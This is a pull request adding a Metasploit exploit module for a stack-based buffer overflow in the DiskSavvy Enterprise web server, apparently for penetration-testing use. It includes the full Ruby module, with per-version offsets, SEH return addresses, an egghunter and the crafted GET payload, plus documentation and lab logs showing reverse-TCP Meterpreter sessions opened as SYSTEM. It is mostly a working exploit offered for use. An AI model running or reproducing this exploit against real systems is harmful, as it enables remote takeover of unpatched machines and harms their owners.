### PR TITLE
Add module for DiskSavvy Enterprise (EDB-40854)

### DIFF
--- a/documentation/modules/exploit/windows/http/disksavvy_get_bof.md
+++ b/documentation/modules/exploit/windows/http/disksavvy_get_bof.md
@@ -1,0 +1,100 @@
+## Vulnerable Application
+
+[DiskSavvy Enterprise](http://www.disksavvy.com) versions up to v9.3.14 are affected by a stack-based buffer overflow vulnerability which can be leveraged by an attacker to execute arbitrary code in the context of NT AUTHORITY\SYSTEM on the target. The vulnerability is caused by improper bounds checking of the request path in HTTP GET requests sent to the built-in web server. This module has been tested successfully on Windows XP SP3 and Windows 7 SP1. The vulnerable application is available for download at [Exploit-DB](https://www.exploit-db.com/apps/20058a6ebf1120bca9ac92b493cac1ff-disksavvyent_setup_v9.1.14.exe).
+
+## Verification Steps
+  1. Install a vulnerable DiskSavvy Enterprise
+  2. Start `Disk Savvy Enterprise` service
+  3. Start `Disk Savvy Enterprise` client application
+  4. Navigate to `Tools` > `Advanced Options` > `Server`
+  5. Check `Enable Web Server On Port 80` to start the web interface
+  6. Start `msfconsole`
+  7. Do `use exploit/windows/http/disksavvy_get_bof`
+  8. Do `set rhost ip`
+  9. Do `check`
+  10. Verify the target is vulnerable
+  11. Do `set payload windows/meterpreter/reverse_tcp`
+  12. Do `set lhost ip`
+  13. Do `exploit`
+  14. Verify the Meterpreter session is opened
+
+## Scenarios
+
+###DiskSavvy Enterprise v9.1.14 on Windows XP SP3
+
+```
+msf exploit(disksavvy_get_bof) > options
+
+Module options (exploit/windows/http/disksavvy_get_bof):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOST    192.168.198.130  yes       The target address
+   RPORT    80               yes       The target port
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (windows/meterpreter/reverse_tcp):
+
+   Name      Current Setting  Required  Description
+   ----      ---------------  --------  -----------
+   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
+   LHOST     192.168.198.138  yes       The listen address
+   LPORT     4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Automatic Targeting
+
+
+msf exploit(disksavvy_get_bof) > exploit
+
+[*] Started reverse TCP handler on 192.168.198.138:4444 
+[*] Automatically detecting the target...
+[*] Selected Target: DiskSavvy Enterprise v9.1.14
+[*] Sending stage (957999 bytes) to 192.168.198.130
+[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:1140) at 2017-01-19 13:38:18 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : GABOR-03722ADE8
+OS              : Windows XP (Build 2600, Service Pack 3).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+meterpreter >
+```
+
+###DiskSavvy Enterprise v9.3.14 on Windows 7 SP1
+
+```
+msf exploit(disksavvy_get_bof) > set rhost 192.168.198.133
+rhost => 192.168.198.130
+msf exploit(disksavvy_get_bof) > exploit
+
+[*] Started reverse TCP handler on 192.168.198.138:4444 
+[*] Automatically detecting the target...
+[*] Selected Target: DiskSavvy Enterprise v9.3.14
+[*] Sending stage (957999 bytes) to 192.168.198.133
+[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49187) at 2017-01-08 05:16:13 -0500
+
+meterpreter > getuid
+Server username: NT AUTHORITY\SYSTEM
+meterpreter > sysinfo
+Computer        : WIN-BCJL9PJ5BF5
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : en_US
+Domain          : WORKGROUP
+Logged On Users : 2
+Meterpreter     : x86/win32
+meterpreter >
+```

--- a/modules/exploits/windows/http/disksavvy_get_bof.rb
+++ b/modules/exploits/windows/http/disksavvy_get_bof.rb
@@ -78,7 +78,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res && res.code == 200
       if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/
-        return Exploit::CheckCode::Vulnerable
+        return Exploit::CheckCode::Appears
       elsif res.body =~ /Disk Savvy Enterprise/
         return Exploit::CheckCode::Detected
       end

--- a/modules/exploits/windows/http/disksavvy_get_bof.rb
+++ b/modules/exploits/windows/http/disksavvy_get_bof.rb
@@ -1,0 +1,145 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Seh
+  include Msf::Exploit::Remote::Egghunter
+  include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'DiskSavvy Enterprise GET Buffer Overflow',
+      'Description'    => %q{
+          This module exploits a stack-based buffer overflow vulnerability
+        in the web interface of DiskSavvy Enterprise v9.1.14 and v9.3.14,
+        caused by improper bounds checking of the request path in HTTP GET
+        requests sent to the built-in web server. This module has been
+        tested successfully on Windows XP SP3 and Windows 7 SP1.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'vportal',      # Vulnerability discovery and PoC
+          'Gabor Seljan'  # Metasploit module
+        ],
+      'References'     =>
+        [
+          ['EDB', '40869']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread'
+        },
+      'Platform'       => 'win',
+      'Payload'        =>
+        {
+          'BadChars'   => "\x00\x09\x0a\x0d\x20",
+          'Space'      => 500
+        },
+      'Targets'        =>
+        [
+          [
+            'Automatic Targeting',
+            {
+              'auto' => true
+            }
+          ],
+          [
+            'DiskSavvy Enterprise v9.1.14',
+            {
+              'Offset' => 542,
+              'Ret'    => 0x101142c0  # POP # POP # RET [libspp.dll]
+            }
+          ],
+          [
+            'DiskSavvy Enterprise v9.3.14',
+            {
+              'Offset' => 2478,
+              'Ret'    => 0x101142ff  # POP # POP # RET [libspp.dll]
+            }
+          ]
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Dec 01 2016',
+      'DefaultTarget'  => 0))
+  end
+
+  def check
+    res = send_request_cgi(
+      'method' => 'GET',
+      'uri'    => '/'
+    )
+
+    if res && res.code == 200
+      if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/
+        return Exploit::CheckCode::Vulnerable
+      elsif res.body =~ /Disk Savvy Enterprise/
+        return Exploit::CheckCode::Detected
+      end
+    else
+      vprint_error('Unable to determine due to a HTTP connection timeout')
+      return Exploit::CheckCode::Unknown
+    end
+
+    Exploit::CheckCode::Safe
+  end
+
+  def exploit
+    mytarget = target
+
+    if target['auto']
+      mytarget = nil
+
+      print_status('Automatically detecting the target...')
+
+      res = send_request_cgi(
+        'method' => 'GET',
+        'uri'    => '/'
+      )
+
+      if res && res.code == 200
+        if res.body =~ /Disk Savvy Enterprise v9\.1\.14/
+          mytarget = targets[1]
+        elsif res.body =~ /Disk Savvy Enterprise v9\.3\.14/
+          mytarget = targets[2]
+        end
+      end
+
+      if !mytarget
+        fail_with(Failure::NoTarget, 'No matching target')
+      end
+
+      print_status("Selected Target: #{mytarget.name}")
+    end
+
+    eggoptions = {
+      checksum: true,
+      eggtag: 'w00t'
+    }
+
+    hunter, egg = generate_egghunter(
+      payload.encoded,
+      payload_badchars,
+      eggoptions
+    )
+
+    sploit =  make_nops(10)
+    sploit << egg
+    sploit << rand_text_alpha(mytarget['Offset'] - egg.length)
+    sploit << generate_seh_record(mytarget.ret)
+    sploit << make_nops(8)
+    sploit << hunter
+    sploit << rand_text_alpha(4500)
+
+    send_request_cgi(
+      'method' => 'GET',
+      'uri'    => sploit
+    )
+  end
+end

--- a/modules/exploits/windows/http/disksavvy_get_bof.rb
+++ b/modules/exploits/windows/http/disksavvy_get_bof.rb
@@ -120,7 +120,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     eggoptions = {
       checksum: true,
-      eggtag: 'w00t'
+      eggtag: rand_text_alpha(4, payload_badchars)
     }
 
     hunter, egg = generate_egghunter(

--- a/modules/exploits/windows/http/disksavvy_get_bof.rb
+++ b/modules/exploits/windows/http/disksavvy_get_bof.rb
@@ -77,9 +77,12 @@ class MetasploitModule < Msf::Exploit::Remote
     )
 
     if res && res.code == 200
-      if res.body =~ /Disk Savvy Enterprise v9\.(1|3)\.14/
-        return Exploit::CheckCode::Appears
-      elsif res.body =~ /Disk Savvy Enterprise/
+      version = res.body[/Disk Savvy Enterprise v[^<]*/]
+      if version
+        vprint_status("Version detected: #{version}")
+        if version =~ /9\.(1|3)\.14/
+          return Exploit::CheckCode::Appears
+        end
         return Exploit::CheckCode::Detected
       end
     else
@@ -115,7 +118,7 @@ class MetasploitModule < Msf::Exploit::Remote
         fail_with(Failure::NoTarget, 'No matching target')
       end
 
-      print_status("Selected Target: #{mytarget.name}")
+      print_status("Selected target: #{mytarget.name}")
     end
 
     eggoptions = {
@@ -136,6 +139,8 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << make_nops(8)
     sploit << hunter
     sploit << rand_text_alpha(4500)
+
+    print_status('Sending malicious request...')
 
     send_request_cgi(
       'method' => 'GET',


### PR DESCRIPTION
This is an MSF port of https://www.exploit-db.com/exploits/40854/. The module exploits a stack-based buffer overflow vulnerability in the web interface of DiskSavvy Enterprise version 9.1.14 and 9.3.14. The vulnerable application is available for download at http://www.disksavvy.com/downloads.html and https://www.exploit-db.com/apps/20058a6ebf1120bca9ac92b493cac1ff-disksavvyent_setup_v9.1.14.exe.

## Verification
- [x] Start `Disk Savvy Enterprise` service
- [x] Start `Disk Savvy Enterprise` client application
- [x] Navigate to `Tools` > `Advanced Options` > `Server`
- [x] Check `Enable Web Server On Port 80` to start the web interface
- [x] Start `msfconsole`
- [x] Do `use exploit/windows/http/disksavvy_get_bof`
- [x] Do `set rhost ip`
- [x] Do `check`
- [x] Verify that the target is vulnerable
- [x] Do `set payload windows/meterpreter/reverse_tcp`
- [x] Do `set lhost ip`
- [x] Do `run`
- [x] Verify that the Meterpreter session is opened

Test run results below for DiskSavvy Enterprise v9.1.14 on Windows XP SP3:

```
msf > use exploit/windows/http/disksavvy_get_bof
msf exploit(disksavvy_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Automatically detecting the target...
[*] Selected Target: Disk Savvy Enterprise v9.1.14
[*] Sending stage (957999 bytes) to 192.168.198.130
[*] Meterpreter session 1 opened (192.168.198.138:4444 -> 192.168.198.130:1140) at 2017-01-19 13:38:18 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : GABOR-03722ADE8
OS              : Windows XP (Build 2600, Service Pack 3).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
```

Test run results below for DiskSavvy Enterprise v9.3.14 on Windows 7 SP1:

```
msf exploit(diskboss_get_bof) > set rhost 192.168.198.133
rhost => 192.168.198.130
msf exploit(diskboss_get_bof) > exploit

[*] Started reverse TCP handler on 192.168.198.138:4444 
[*] Automatically detecting the target...
[*] Selected Target: DiskSavvy Enterprise v9.3.14
[*] Sending stage (957999 bytes) to 192.168.198.133
[*] Meterpreter session 2 opened (192.168.198.138:4444 -> 192.168.198.133:49379) at 2017-01-19 14:00:40 -0500

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : WIN-BCJL9PJ5BF5
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >
```